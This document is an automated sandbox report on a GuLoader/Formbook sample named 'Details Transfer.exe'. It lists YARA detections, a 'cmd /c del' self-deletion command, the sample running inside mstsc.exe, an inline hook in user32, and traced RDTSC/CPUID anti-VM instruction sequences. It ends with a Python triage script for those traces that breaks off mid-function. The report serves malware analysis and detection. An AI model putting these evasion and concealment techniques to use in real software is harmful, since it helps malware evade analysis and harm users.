      Source: Details Transfer.exe, 00000002.00000002.306702886.000000001E7A3000.00000040.00000001.sdmp Binary or memory string: OriginalFilenamemstsc.exej% vs Details Transfer.exe
      Source: Details Transfer.exe, 00000002.00000002.305089937.000000001DD80000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameCRYPT32.DLL.MUIj% vs Details Transfer.exe
      Source: Details Transfer.exe, 00000002.00000000.225112022.000000000040C000.00000002.00020000.sdmp Binary or memory string: OriginalFilenamepellet.exe vs Details Transfer.exe
      Source: Details Transfer.exe Binary or memory string: OriginalFilenamepellet.exe vs Details Transfer.exe
      Source: 0000000C.00000002.471474023.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.471474023.0000000000AF0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.472575056.0000000000F10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.472575056.0000000000F10000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.472634942.0000000000F40000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000C.00000002.472634942.0000000000F40000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 00000002.00000002.301196931.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.301196931.00000000000A0000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000C.00000002.471837023.0000000000BA2000.00000004.00000020.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 0000000C.00000002.476551584.000000000534F000.00000004.00000001.sdmp, type: MEMORY Matched rule: LokiBot_Dropper_Packed_R11_Feb18 date = 2018-02-14, hash1 = 3b248d40fd7acb839cc592def1ed7652734e0e5ef93368be3c36c042883a3029, author = Florian Roth, description = Auto-generated rule - file scan copy.pdf.r11, reference = https://app.any.run/tasks/401df4d9-098b-4fd0-86e0-7a52ce6ddbf5, license = https://creativecommons.org/licenses/by-nc/4.0/
      Source: 00000002.00000002.305279752.000000001E120000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 00000002.00000002.305279752.000000001E120000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/0@5/1
      Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1968:120:WilError_01
      Source: C:\Users\user\Desktop\Details Transfer.exe File created: C:\Users\user\AppData\Local\Temp\~DFB9981D64B7738EA0.TMP
      Source: Details Transfer.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Details Transfer.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: C:\Users\user\Desktop\Details Transfer.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\Details Transfer.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\Details Transfer.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\Details Transfer.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Users\user\Desktop\Details Transfer.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts
      Source: unknown Process created: C:\Users\user\Desktop\Details Transfer.exe 'C:\Users\user\Desktop\Details Transfer.exe'
      Source: unknown Process created: C:\Users\user\Desktop\Details Transfer.exe 'C:\Users\user\Desktop\Details Transfer.exe'
      Source: unknown Process created: C:\Windows\SysWOW64\mstsc.exe C:\Windows\SysWOW64\mstsc.exe
      Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Details Transfer.exe'
      Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Users\user\Desktop\Details Transfer.exe Process created: C:\Users\user\Desktop\Details Transfer.exe 'C:\Users\user\Desktop\Details Transfer.exe'
      Source: C:\Windows\SysWOW64\mstsc.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Details Transfer.exe'
      Source: Window Recorder Window detected: More than 3 window changes detected
      Source: Binary string: wntdll.pdbUGP source: Details Transfer.exe, 00000002.00000002.305770230.000000001E350000.00000040.00000001.sdmp, mstsc.exe, 0000000C.00000002.475461428.0000000004F3F000.00000040.00000001.sdmp
      Source: Binary string: wntdll.pdb source: Details Transfer.exe, mstsc.exe
      Source: Binary string: mstsc.pdbGCTL source: Details Transfer.exe, 00000002.00000002.306564678.000000001E680000.00000040.00000001.sdmp
      Source: Binary string: mstsc.pdb source: Details Transfer.exe, 00000002.00000002.306564678.000000001E680000.00000040.00000001.sdmp

      Data Obfuscation:

      Yara detected GuLoader
      Source: Yara match File source: 00000002.00000002.301329447.0000000000560000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match File source: Process Memory Space: Details Transfer.exe PID: 6716, type: MEMORY
      Source: Yara match File source: Process Memory Space: Details Transfer.exe PID: 6936, type: MEMORY
      Yara detected VB6 Downloader Generic
      Source: Yara match File source: Process Memory Space: Details Transfer.exe PID: 6716, type: MEMORY
      Source: Yara match File source: Process Memory Space: Details Transfer.exe PID: 6936, type: MEMORY
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_0040208C push esi; retf 0_2_0040208D
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_004024BF push esp; ret 0_2_004024C1
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_0040254B push esp; ret 0_2_0040254D
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_0040515B push ebp; ret 0_2_0040516C
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_00402901 push esp; ret 0_2_00402909
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_0040253D push esp; ret 0_2_00402541
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_00402DF8 push edi; iretd 0_2_00402E2A
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_00403192 pushfd ; ret 0_2_00403193
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_00402ACA push esi; retf 0_2_00402ACD
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_00404B51 push ebp; retf 0_2_00404B5A
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_00403301 pushfd ; iretd 0_2_004033A7
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_00404BE3 pushfd ; retf 0_2_00404BF5
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_04F4271D push esi; ret 0_2_04F42725
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 2_2_1E3CD0D1 push ecx; ret 2_2_1E3CD0E4
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_04E9D0D1 push ecx; ret 12_2_04E9D0E4
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B0691E push eax; ret 12_2_00B0691F
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B06A5E push ds; ret 12_2_00B06A5F
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B0E46B push edi; retf 12_2_00B0E46C
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B0CEA5 push eax; ret 12_2_00B0CEF8
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B0CEF2 push eax; ret 12_2_00B0CEF8
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B0CEFB push eax; ret 12_2_00B0CF62
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B07624 push ebp; ret 12_2_00B0762E
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B0761D push 72A11B81h; iretd 12_2_00B07623
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B0BE68 push ss; ret 12_2_00B0BE6C
      Source: C:\Windows\SysWOW64\mstsc.exe Code function: 12_2_00B0CF5C push eax; ret 12_2_00B0CF62

      Hooking and other Techniques for Hiding and Protection:

      Modifies the prolog of user mode functions (user mode inline hooks)
      Source: explorer.exe User mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x83 0x3E 0xE2
      Source: C:\Users\user\Desktop\Details Transfer.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Details Transfer.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Details Transfer.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Details Transfer.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\Details Transfer.exe Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\SysWOW64\mstsc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      Contains functionality to detect hardware virtualization (CPUID execution measurement)
      Source: C:\Users\user\Desktop\Details Transfer.exe Code function: 0_2_04F40208 EnumWindows,NtSetInformationThread,TerminateProcess,LoadLibraryA, 0_2_04F40208
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)
      Source: C:\Users\user\Desktop\Details Transfer.exe RDTSC instruction interceptor: First address: 0000000004F43030 second address: 0000000004F43030 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FC0509987F8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f jmp 00007FC0509987FEh 0x00000021 test dh, bh 0x00000023 pop ecx 0x00000024 cmp bx, cx 0x00000027 add edi, edx 0x00000029 dec ecx 0x0000002a cmp ecx, 00000000h 0x0000002d jne 00007FC0509987C8h 0x0000002f cmp dx, ax 0x00000032 test dl, cl 0x00000034 push ecx 0x00000035 cmp cx, dx 0x00000038 call 00007FC05099881Fh 0x0000003d call 00007FC05099880Ah 0x00000042 lfence 0x00000045 mov edx, dword ptr [7FFE0014h] 0x0000004b lfence 0x0000004e ret 0x0000004f mov esi, edx 0x00000051 pushad 0x00000052 rdtsc
      Tries to detect Any.run
      Source: C:\Users\user\Desktop\Details Transfer.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\Details Transfer.exe File opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\Details Transfer.exe File opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\Details Transfer.exe File opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
      Source: Details Transfer.exe Binary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\Details Transfer.exe RDTSC instruction interceptor: First address: 0000000004F42C84 second address: 0000000004F42CA9 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+14h], ecx 0x00000006 mov ecx, dword ptr [eax+24h] 0x00000009 cmp bx, bx 0x0000000c mov dword ptr [ebp+10h], ecx 0x0000000f mov esi, dword ptr [eax+20h] 0x00000012 test edx, eax 0x00000014 add esi, dword ptr [ebp+04h] 0x00000017 xor ecx, ecx 0x00000019 test dl, cl 0x0000001b test cl, bl 0x0000001d mov edx, dword ptr [esi] 0x0000001f pushad 0x00000020 mov esi, 000000ECh 0x00000025 rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exe RDTSC instruction interceptor: First address: 0000000004F43030 second address: 0000000004F43030 instructions: 0x00000000 rdtsc 0x00000002 mov eax, 00000001h 0x00000007 cpuid 0x00000009 popad 0x0000000a call 00007FC0509987F8h 0x0000000f lfence 0x00000012 mov edx, dword ptr [7FFE0014h] 0x00000018 lfence 0x0000001b ret 0x0000001c sub edx, esi 0x0000001e ret 0x0000001f jmp 00007FC0509987FEh 0x00000021 test dh, bh 0x00000023 pop ecx 0x00000024 cmp bx, cx 0x00000027 add edi, edx 0x00000029 dec ecx 0x0000002a cmp ecx, 00000000h 0x0000002d jne 00007FC0509987C8h 0x0000002f cmp dx, ax 0x00000032 test dl, cl 0x00000034 push ecx 0x00000035 cmp cx, dx 0x00000038 call 00007FC05099881Fh 0x0000003d call 00007FC05099880Ah 0x00000042 lfence 0x00000045 mov edx, dword ptr [7FFE0014h] 0x0000004b lfence 0x0000004e ret 0x0000004f mov esi, edx 0x00000051 pushad 0x00000052 rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exe RDTSC instruction interceptor: First address: 0000000004F43054 second address: 0000000004F43054 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FC050396BF1h 0x0000001f popad 0x00000020 call 00007FC0503969ACh 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exe RDTSC instruction interceptor: First address: 0000000004F403DE second address: 0000000004F40428 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 add edi, 00010000h 0x00000009 push edi 0x0000000a cmp ebx, eax 0x0000000c add edi, 04h 0x0000000f push edi 0x00000010 add edi, 04h 0x00000013 jmp 00007FC050998802h 0x00000015 cld 0x00000016 push edi 0x00000017 test dh, bh 0x00000019 push 0003E800h 0x0000001e add edi, 04h 0x00000021 test edi, B6A16B30h 0x00000027 push edi 0x00000028 cmp ah, dh 0x0000002a push 00000003h 0x0000002c push 00000030h 0x0000002e push dword ptr [ebp+0000009Ch] 0x00000034 pushad 0x00000035 mov ebx, 0000002Fh 0x0000003a rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exe RDTSC instruction interceptor: First address: 0000000004F40428 second address: 0000000004F42E7E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push eax 0x00000004 call 00007FC05039A058h 0x00000009 call 00007FC050396925h 0x0000000e pop ebx 0x0000000f sub ebx, 05h 0x00000012 jmp 00007FC050396936h 0x00000014 cmp dx, ax 0x00000017 inc ebx 0x00000018 jmp 00007FC050396932h 0x0000001a test edx, ecx 0x0000001c dec ebx 0x0000001d xor edx, edx 0x0000001f mov eax, ebx 0x00000021 mov ecx, 00000004h 0x00000026 div ecx 0x00000028 cmp edx, 00000000h 0x0000002b jne 00007FC0503968FDh 0x0000002d movd mm3, ebx 0x00000030 jmp 00007FC050396932h 0x00000032 test ah, dh 0x00000034 pop eax 0x00000035 movd mm1, eax 0x00000038 jmp 00007FC05039692Eh 0x0000003a test bx, ax 0x0000003d call 00007FC050395E57h 0x00000042 cmp dx, ax 0x00000045 pushad 0x00000046 test dl, cl 0x00000048 push F21FD920h 0x0000004d cmp cx, dx 0x00000050 call 00007FC05039667Bh 0x00000055 pushad 0x00000056 mov esi, 000000A8h 0x0000005b rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 0000000004F40428 second address: 0000000004F42E7E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push eax 0x00000004 call 00007FC05039A058h 0x00000009 call 00007FC050396925h 0x0000000e pop ebx 0x0000000f sub ebx, 05h 0x00000012 jmp 00007FC050396936h 0x00000014 cmp dx, ax 0x00000017 inc ebx 0x00000018 jmp 00007FC050396932h 0x0000001a test edx, ecx 0x0000001c dec ebx 0x0000001d xor edx, edx 0x0000001f mov eax, ebx 0x00000021 mov ecx, 00000004h 0x00000026 div ecx 0x00000028 cmp edx, 00000000h 0x0000002b jne 00007FC0503968FDh 0x0000002d movd mm3, ebx 0x00000030 jmp 00007FC050396932h 0x00000032 test ah, dh 0x00000034 pop eax 0x00000035 movd mm1, eax 0x00000038 jmp 00007FC05039692Eh 0x0000003a test bx, ax 0x0000003d call 00007FC050395E57h 0x00000042 cmp dx, ax 0x00000045 pushad 0x00000046 test dl, cl 0x00000048 push F21FD920h 0x0000004d cmp cx, dx 0x00000050 call 00007FC05039667Bh 0x00000055 pushad 0x00000056 mov esi, 000000A8h 0x0000005b rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 0000000004F40539 second address: 0000000004F42E7E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push 00000000h 0x00000005 push 00000004h 0x00000007 cmp ebx, eax 0x00000009 mov edx, ebp 0x0000000b add edx, 0000009Ch 0x00000011 push edx 0x00000012 test ecx, edx 0x00000014 test ah, FFFFFF82h 0x00000017 push 00000007h 0x00000019 test bx, ax 0x0000001c clc 0x0000001d push FFFFFFFFh 0x0000001f push eax 0x00000020 cmp bl, FFFFFFCEh 0x00000023 call 00007FC05099BDF8h 0x00000028 call 00007FC0509987F5h 0x0000002d pop ebx 0x0000002e sub ebx, 05h 0x00000031 jmp 00007FC050998806h 0x00000033 cmp dx, ax 0x00000036 inc ebx 0x00000037 jmp 00007FC050998802h 0x00000039 test edx, ecx 0x0000003b dec ebx 0x0000003c xor edx, edx 0x0000003e mov eax, ebx 0x00000040 mov ecx, 00000004h 0x00000045 div ecx 0x00000047 cmp edx, 00000000h 0x0000004a jne 00007FC0509987CDh 0x0000004c movd mm3, ebx 0x0000004f jmp 00007FC050998802h 0x00000051 test ah, dh 0x00000053 pop eax 0x00000054 movd mm1, eax 0x00000057 jmp 00007FC0509987FEh 0x00000059 test bx, ax 0x0000005c call 00007FC050997D27h 0x00000061 cmp dx, ax 0x00000064 pushad 0x00000065 test dl, cl 0x00000067 push F21FD920h 0x0000006c cmp cx, dx 0x0000006f call 00007FC05099854Bh 0x00000074 pushad 0x00000075 mov esi, 000000A8h 0x0000007a rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 0000000000562C84 second address: 0000000000562CA9 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 mov dword ptr [ebp+14h], ecx 0x00000006 mov ecx, dword ptr [eax+24h] 0x00000009 cmp bx, bx 0x0000000c mov dword ptr [ebp+10h], ecx 0x0000000f mov esi, dword ptr [eax+20h] 0x00000012 test edx, eax 0x00000014 add esi, dword ptr [ebp+04h] 0x00000017 xor ecx, ecx 0x00000019 test dl, cl 0x0000001b test cl, bl 0x0000001d mov edx, dword ptr [esi] 0x0000001f pushad 0x00000020 mov esi, 000000ECh 0x00000025 rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 0000000000563054 second address: 0000000000563054 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a ret 0x0000000b mov esi, edx 0x0000000d pushad 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 bt ecx, 1Fh 0x00000019 jc 00007FC050998AC1h 0x0000001f popad 0x00000020 call 00007FC05099887Ch 0x00000025 lfence 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 00000000005603DE second address: 0000000000560428 instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 add edi, 00010000h 0x00000009 push edi 0x0000000a cmp ebx, eax 0x0000000c add edi, 04h 0x0000000f push edi 0x00000010 add edi, 04h 0x00000013 jmp 00007FC050396932h 0x00000015 cld 0x00000016 push edi 0x00000017 test dh, bh 0x00000019 push 0003E800h 0x0000001e add edi, 04h 0x00000021 test edi, B6A16B30h 0x00000027 push edi 0x00000028 cmp ah, dh 0x0000002a push 00000003h 0x0000002c push 00000030h 0x0000002e push dword ptr [ebp+0000009Ch] 0x00000034 pushad 0x00000035 mov ebx, 0000002Fh 0x0000003a rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 0000000000560428 second address: 0000000000562E7E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push eax 0x00000004 call 00007FC05099BF28h 0x00000009 call 00007FC0509987F5h 0x0000000e pop ebx 0x0000000f sub ebx, 05h 0x00000012 jmp 00007FC050998806h 0x00000014 cmp dx, ax 0x00000017 inc ebx 0x00000018 jmp 00007FC050998802h 0x0000001a test edx, ecx 0x0000001c dec ebx 0x0000001d xor edx, edx 0x0000001f mov eax, ebx 0x00000021 mov ecx, 00000004h 0x00000026 div ecx 0x00000028 cmp edx, 00000000h 0x0000002b jne 00007FC0509987CDh 0x0000002d movd mm3, ebx 0x00000030 jmp 00007FC050998802h 0x00000032 test ah, dh 0x00000034 pop eax 0x00000035 movd mm1, eax 0x00000038 jmp 00007FC0509987FEh 0x0000003a test bx, ax 0x0000003d call 00007FC050997D27h 0x00000042 cmp dx, ax 0x00000045 pushad 0x00000046 test dl, cl 0x00000048 push F21FD920h 0x0000004d cmp cx, dx 0x00000050 call 00007FC05099854Bh 0x00000055 pushad 0x00000056 mov esi, 000000A8h 0x0000005b rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 0000000000560539 second address: 0000000000562E7E instructions: 0x00000000 rdtsc 0x00000002 popad 0x00000003 push 00000000h 0x00000005 push 00000004h 0x00000007 cmp ebx, eax 0x00000009 mov edx, ebp 0x0000000b add edx, 0000009Ch 0x00000011 push edx 0x00000012 test ecx, edx 0x00000014 test ah, FFFFFF82h 0x00000017 push 00000007h 0x00000019 test bx, ax 0x0000001c clc 0x0000001d push FFFFFFFFh 0x0000001f push eax 0x00000020 cmp bl, FFFFFFCEh 0x00000023 call 00007FC050399F28h 0x00000028 call 00007FC050396925h 0x0000002d pop ebx 0x0000002e sub ebx, 05h 0x00000031 jmp 00007FC050396936h 0x00000033 cmp dx, ax 0x00000036 inc ebx 0x00000037 jmp 00007FC050396932h 0x00000039 test edx, ecx 0x0000003b dec ebx 0x0000003c xor edx, edx 0x0000003e mov eax, ebx 0x00000040 mov ecx, 00000004h 0x00000045 div ecx 0x00000047 cmp edx, 00000000h 0x0000004a jne 00007FC0503968FDh 0x0000004c movd mm3, ebx 0x0000004f jmp 00007FC050396932h 0x00000051 test ah, dh 0x00000053 pop eax 0x00000054 movd mm1, eax 0x00000057 jmp 00007FC05039692Eh 0x00000059 test bx, ax 0x0000005c call 00007FC050395E57h 0x00000061 cmp dx, ax 0x00000064 pushad 0x00000065 test dl, cl 0x00000067 push F21FD920h 0x0000006c cmp cx, dx 0x0000006f call 00007FC05039667Bh 0x00000074 pushad 0x00000075 mov esi, 000000A8h 0x0000007a rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeRDTSC instruction interceptor: First address: 0000000000409B4E second address: 0000000000409B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 0000000000AF98E4 second address: 0000000000AF98EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Windows\SysWOW64\mstsc.exeRDTSC instruction interceptor: First address: 0000000000AF9B4E second address: 0000000000AF9B54 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\Details Transfer.exeCode function: 0_2_04F40208 rdtsc 0_2_04F40208
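The interceptor lines above record the instructions the sample executes between two RDTSC reads, and three idioms recur in them. First, CPUID sits between the two RDTSCs: CPUID is intercepted by every practical hypervisor (unconditionally under VT-x), so the measured delta is far larger in a guest than on bare metal. Second, `mov eax, 1` / `cpuid` / `bt ecx, 1Fh` tests CPUID leaf 1 ECX bit 31, the hypervisor-present bit. Third, the stub reads `[7FFE0014h]`, which is KUSER_SHARED_DATA.SystemTime (the shared page is mapped at 0x7FFE0000 in every user-mode process), a clock that an RDTSC hook alone cannot fake, and does so inside a `dec ecx` / `jne` loop so that one fast iteration does not get the sample past the check. The script below is an added example and is not Joe Sandbox or GuLoader code: it parses report lines in this format and labels each RDTSC window with the idioms it contains. The three sample lines are copied from this section; the function names and output labels are the example's own.

```python
"""Triage Joe Sandbox "RDTSC instruction interceptor" evidence lines.

Added example for this report, not Joe Sandbox or GuLoader code.  Each report
line records the instructions executed between two RDTSC hits; this script
flags the anti-VM idioms found in that window.
"""
import re

# KUSER_SHARED_DATA is mapped at 0x7FFE0000 in every user-mode process.
# Offset 0x14 is SystemTime.LowPart: a clock the loader can read without a
# syscall and without RDTSC, so patching RDTSC alone does not defeat the check.
KUSER_SYSTEMTIME_LOW = "[7ffe0014h]"

LINE_RE = re.compile(
    r"Source:\s*(?P<proc>.+?\.exe)\s*RDTSC instruction interceptor:\s*"
    r"First address:\s*(?P<first>[0-9A-Fa-f]+)\s+second address:\s*(?P<second>[0-9A-Fa-f]+)"
    r"\s+instructions:\s*(?P<body>.*)$"
)
# Every instruction in the dump is preceded by its byte offset, e.g. "0x00000013 cpuid".
OFFSET_RE = re.compile(r"0x[0-9A-Fa-f]{8}\s+")


def parse_instructions(body):
    """Turn the flattened dump into a list of lower-cased instruction strings."""
    return [p.strip().lower() for p in OFFSET_RE.split(body) if p.strip()]


def classify(line):
    """Return a dict of findings for one evidence line, or None if it is not one."""
    m = LINE_RE.search(line)
    if m is None:
        return None
    insns = parse_instructions(m.group("body"))
    rdtsc_idx = [i for i, ins in enumerate(insns) if ins.startswith("rdtsc")]
    window = insns[rdtsc_idx[0] + 1:rdtsc_idx[-1]] if len(rdtsc_idx) >= 2 else []

    # CPUID between the two RDTSCs: the VM exit it causes inflates the delta.
    cpuid_between = any(ins == "cpuid" for ins in window)

    # "mov eax, 1 ; cpuid ; bt ecx, 1Fh": leaf 1 ECX bit 31 is the hypervisor-present bit.
    hv_bit = False
    for i, ins in enumerate(insns):
        if ins == "bt ecx, 1fh":
            before = insns[:i]
            hv_bit = "cpuid" in before and "mov eax, 00000001h" in before
            break

    # "dec ecx ... jne" after the measurement: the check is repeated, so a
    # single lucky fast iteration is not enough.
    loop = False
    if "dec ecx" in insns:
        after_dec = insns[insns.index("dec ecx") + 1:]
        loop = any(ins.startswith("jne") for ins in after_dec)

    reads_systemtime = any(KUSER_SYSTEMTIME_LOW in ins for ins in insns)

    techniques = []
    if cpuid_between:
        techniques.append("rdtsc/cpuid timing")
    if hv_bit:
        techniques.append("cpuid hypervisor-present bit")
    if reads_systemtime:
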